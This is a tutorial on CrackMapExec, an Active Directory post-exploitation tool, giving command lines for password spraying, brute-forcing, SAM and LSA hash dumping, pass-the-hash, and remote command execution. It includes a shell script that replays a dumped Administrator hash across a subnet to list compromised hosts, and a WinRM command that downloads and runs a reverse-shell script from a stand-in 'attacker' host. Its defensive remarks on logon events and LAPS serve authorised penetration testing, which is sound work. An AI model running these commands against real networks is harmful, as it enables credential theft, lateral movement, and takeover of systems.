crackmapexec: Post-exploitation and penetration testing tool

CrackMapExec (CME) is a powerful post-exploitation tool designed for assessing the security of Windows and Active Directory environments. It automates common penetration testing tasks, including credential testing, lateral movement, and privilege escalation.


What is CrackMapExec?

CrackMapExec is a Swiss Army knife for red teams and penetration testers working in Active Directory environments. It leverages protocols like SMB, MSSQL, WinRM, RDP, LDAP, and SSH to perform various attacks, including:

  • Credential spraying
  • Password brute-forcing
  • Lateral movement
  • Privilege escalation
  • Dumping credentials (LSASS, SAM, LSA)
  • Session management

How CrackMapExec Works

CME uses valid credentials (or brute-forced ones) to interact with remote systems via different protocols:

  • SMB: Enumerate shares, execute commands, dump hashes.
  • WinRM: Execute PowerShell commands remotely.
  • MSSQL: Execute SQL queries, spawn shells.
  • LDAP: Query Active Directory for users, groups, and other objects.
  • RDP: Check for access and perform brute-forcing.

It is not a stealthy tool. Every authentication attempt writes a logon event (4624 on success, 4625 on failure) on the target and, for domain accounts, on the domain controller, and command execution (-x/-X) spawns a process through WMI, a temporary service, or a scheduled task depending on --exec-method. Thread count and jitter control the load you put on the network, not your visibility to the defender.


Installation

On Kali Linux (Official Repo)

Bash
sudo apt update && sudo apt install crackmapexec

From Source (Latest Version)

Bash
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
pip install .

Note: the byt3bl33d3r repository is archived and CrackMapExec is no longer maintained under that name; its actively developed successor is NetExec (https://github.com/Pennyw0rth/NetExec), which keeps the same protocol and option layout. Install into an isolated environment (virtualenv or pipx) so the pinned Impacket does not collide with a system-wide copy.

Dependencies

  • Python 3.9+
  • Impacket (pip install impacket)
  • Other required packages (installed automatically if using pip)

Basic Usage Examples

General Syntax

Bash
crackmapexec <protocol> <target(s)> -u <user> -p <password> [options]

Example 1: Check SMB Access

Bash
crackmapexec smb 192.168.1.0/24 -u admin -p P@ssw0rd
  • Checks which hosts accept the credentials admin:P@ssw0rd over SMB. A [+] line means the login succeeded; the (Pwn3d!) marker after it means the account is a local administrator on that host.

Example 2: Brute-Force Credentials

Bash
crackmapexec smb 192.168.1.100 -u users.txt -p passwords.txt
  • Tests every username in users.txt against every password in passwords.txt. Add --no-bruteforce to pair the files line by line (user1:password1, user2:password2) and --continue-on-success to keep going after the first valid login. Read the domain lockout policy before spraying: a full cross-product will lock accounts out.

Example 3: Execute a Command

Bash
crackmapexec smb 192.168.1.100 -u admin -p P@ssw0rd -x "whoami"
  • Runs whoami on the target machine.

Example 4: Dump SAM Hashes

Bash
crackmapexec smb 192.168.1.100 -u admin -p P@ssw0rd --sam
  • Retrieves local user hashes from the SAM database in user:RID:LMhash:NThash::: form. Requires local administrator rights on the target.

Advanced Usage

Pass-the-Hash (PtH) Attack

Bash
crackmapexec smb 192.168.1.100 -u admin -H NTLM_HASH --local-auth
  • Uses an NTLM hash instead of a plaintext password. -H accepts the NT hash alone or LM:NT; --local-auth tests it against the target's local SAM rather than the domain, which is the usual way to find local-administrator password reuse.
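Local-admin password reuse is the common Pass-the-Hash target: dump the SAM on one box, then replay the Administrator NT hash across the subnet with --local-auth. The script below is an added example, not code from the page or from CrackMapExec. It parses saved --sam output (the user:RID:LMhash:NThash::: lines), keeps only the built-in Administrator (RID 500), reports rather than replays the well-known blank-password hash, and prints the IP of every host that comes back Pwn3d!. It assumes the dump was saved to a file and that the hypothetical CME_BIN variable names the binary.

```bash
#!/bin/sh
# Added example (not from the page or CrackMapExec): replay SAM hashes from
# one host against a subnet with --local-auth to find local-admin reuse.
# Assumptions: dump.txt holds saved `--sam` output; CME_BIN is hypothetical.

CME_BIN="${CME_BIN:-crackmapexec}"
BLANK_NT="31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# sam_nt_hashes < dump  ->  "user rid nthash" for every secretsdump-style
# record (user:RID:LMhash:NThash:::); CME's status and banner lines are
# skipped because their last field does not split into such a record.
sam_nt_hashes() {
    awk '{
        n = split($NF, f, ":")
        if (n >= 4 && f[2] ~ /^[0-9]+$/ && length(f[4]) == 32 && f[4] ~ /^[0-9a-f]+$/)
            print f[1], f[2], f[4]
    }'
}

# Print the IP (field 2 of CME output) of every host reporting Pwn3d!
pwned_hosts() {
    awk '/Pwn3d!/ { print $2 }'
}

# pth_reuse_check SUBNET DUMP_FILE
# Only the built-in Administrator (RID 500) is replayed: other local accounts
# rarely hold admin rights, and a blank hash is reported instead of tried.
pth_reuse_check() {
    subnet=$1; dump=$2
    sam_nt_hashes < "$dump" | while read -r user rid nt; do
        [ "$rid" = 500 ] || continue
        if [ "$nt" = "$BLANK_NT" ]; then
            echo "skipping $user: blank password" >&2
            continue
        fi
        "$CME_BIN" smb "$subnet" -u "$user" -H "$nt" --local-auth \
            2>/dev/null </dev/null | pwned_hosts
    done
}

# Usage: crackmapexec smb 192.168.1.100 -u admin -p P@ssw0rd --sam > dump.txt
#        ./pth_reuse.sh 192.168.1.0/24 dump.txt
if [ $# -eq 2 ]; then
    pth_reuse_check "$@"
fi
```

Every IP printed is a host where the dumped Administrator hash grants local admin, which is exactly the lateral-movement path a shared local administrator password opens; the same list is the finding to hand to the client (fix: LAPS or per-host passwords).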

Kerberos Authentication

Bash
crackmapexec smb 192.168.1.100 -u admin -p P@ssw0rd -k
  • Authenticates using Kerberos (requires valid domain credentials). Target the host by its DNS name rather than by IP so the service ticket's SPN matches, and make sure the attacking machine can resolve the domain controller that issues the tickets.

MSSQL Command Execution

Bash
crackmapexec mssql 192.168.1.100 -u sa -p sqlpassword -q "SELECT name FROM master..sysdatabases"
  • Executes a SQL query.

LDAP Enumeration

Bash
crackmapexec ldap 192.168.1.100 -u admin -p P@ssw0rd --users
  • Lists all users in the domain.

Spawning a Shell

Bash
crackmapexec winrm 192.168.1.100 -u admin -p P@ssw0rd -X "powershell -nop -c \"IEX(New-Object Net.WebClient).DownloadString('http://attacker/shell.ps1')\""
  • Downloads a PowerShell script from the attacker's host and runs it in memory with IEX (here a reverse shell). A download cradle like this is a common AV/EDR signature, so expect it to be caught on monitored hosts.

Command-Line Options

Option               Description
-u, --user           Username, or a file containing usernames (one per line)
-p, --password       Password, or a file containing passwords
-H, --hash           NTLM hash (NT, or LM:NT) for Pass-the-Hash
-d, --domain         Domain name
-M, --module         Load a CME module (e.g., -M mimikatz)
-x, --execute        Execute a command
-X, --ps-execute     Execute a PowerShell command
--sam                Dump SAM hashes
--lsa                Dump LSA secrets
--shares             Enumerate SMB shares
--sessions           List active sessions
--loggedon-users     List logged-on users
--local-auth         Authenticate against the local SAM (not via the domain)
-k, --kerberos       Use Kerberos authentication

Supported Protocols

1. SMB (Server Message Block)

  • Used for file sharing, remote command execution, and credential attacks.
    Example:
Bash
crackmapexec smb 192.168.1.0/24 -u admin -p P@ssw0rd --shares
  • Enumerate SMB shares across a subnet.

2. WinRM (Windows Remote Management)

  • Executes PowerShell commands remotely.
    Example:
Bash
crackmapexec winrm 192.168.1.100 -u admin -p P@ssw0rd -X "whoami"
  • Runs whoami via WinRM.

3. SSH (Secure Shell)

  • Tests SSH credentials and executes commands.
    Example:
Bash
crackmapexec ssh 192.168.1.100 -u root -p password -x "id"
  • Runs id on a Linux/Unix system.

4. FTP (File Transfer Protocol)

  • Checks FTP credentials and uploads/downloads files.
    Example:
Bash
crackmapexec ftp 192.168.1.100 -u admin -p P@ssw0rd
  • Tests FTP login.

5. RDP (Remote Desktop Protocol)

  • Checks if credentials work for RDP.
    Example:
Bash
crackmapexec rdp 192.168.1.100 -u admin -p P@ssw0rd
  • Verifies RDP access (does not establish a full session).

6. MSSQL (Microsoft SQL Server)

  • Executes SQL queries or commands.
    Example:
Bash
crackmapexec mssql 192.168.1.100 -u sa -p sqlpassword -q "SELECT name FROM master..sysdatabases"
  • Lists all databases.

7. LDAP (Lightweight Directory Access Protocol)

  • Queries Active Directory for users, groups, and policies.
    Example:
Bash
crackmapexec ldap 192.168.1.100 -u admin -p P@ssw0rd --users
  • Lists all domain users.

Runtime Options

1. Thread Control (-t)

  • Scenario: Fast scanning without overwhelming the network.
Bash
crackmapexec smb 192.168.1.0/24 -u user -p pass -t 20
  • Caps CME at 20 concurrent threads (the default is considerably higher), which reduces load on the network and the burst of simultaneous logon events on the targets.

2. Jitter (--jitter)

  • Scenario: Avoid detection by adding random delays.
Bash
crackmapexec smb 192.168.1.0/24 -u user -p pass --jitter 3
  • Adds a random delay of up to 3 seconds between connections, smoothing out the burst of logon attempts rather than hiding them.

3. Timeout (--timeout)

  • Scenario: Skip unresponsive hosts quickly.
Bash
crackmapexec smb 192.168.1.0/24 --timeout 2
  • Without credentials CME still fingerprints every host (hostname, domain, OS, SMB signing); --timeout 2 gives up on hosts that do not answer within 2 seconds instead of waiting out the default.

4. Verbose Mode (--verbose)

  • Scenario: Debug connection issues.
Bash
crackmapexec smb 192.168.1.100 -u admin -p wrongpass --verbose
  • Shows the underlying errors (e.g., STATUS_LOGON_FAILURE for a bad password, STATUS_ACCOUNT_LOCKED_OUT for a locked account) instead of a bare failure marker.

Real-World Use Cases

  1. Internal Penetration Testing

    • Test credentials across multiple machines.
    • Identify misconfigurations (e.g., exposed SMB shares).
  2. Red Team Operations

    • Move laterally using Pass-the-Hash.
    • Dump credentials for privilege escalation.
  3. Active Directory Auditing

    • Find stale accounts, weak passwords.
    • Check for excessive privileges.
  4. Post-Exploitation

    • Execute Mimikatz in memory (-M mimikatz).
    • Establish persistence via scheduled tasks.

Troubleshooting Tips

  • “Connection Failed” Errors

    • Check if the target service (SMB/WinRM) is running.
    • Verify network connectivity (ping, nmap).
  • Authentication Issues

    • Ensure credentials are correct.
    • Use --local-auth if targeting local accounts.
  • Module Errors

    • Update CME (git pull).
    • Reinstall dependencies (pip install -r requirements.txt).
  • Firewall/AV Detection

    • Expect in-memory PowerShell payloads (-X download cradles, -M mimikatz) to be flagged by AV/EDR; encoded PowerShell is itself a common detection signature, not an evasion.
    • Where the engagement allows, prefer protocol-level options that drop nothing on the host (--shares, --sessions, --loggedon-users, --sam, --lsa) and switch --exec-method (wmiexec, smbexec, atexec) if one execution path is blocked.
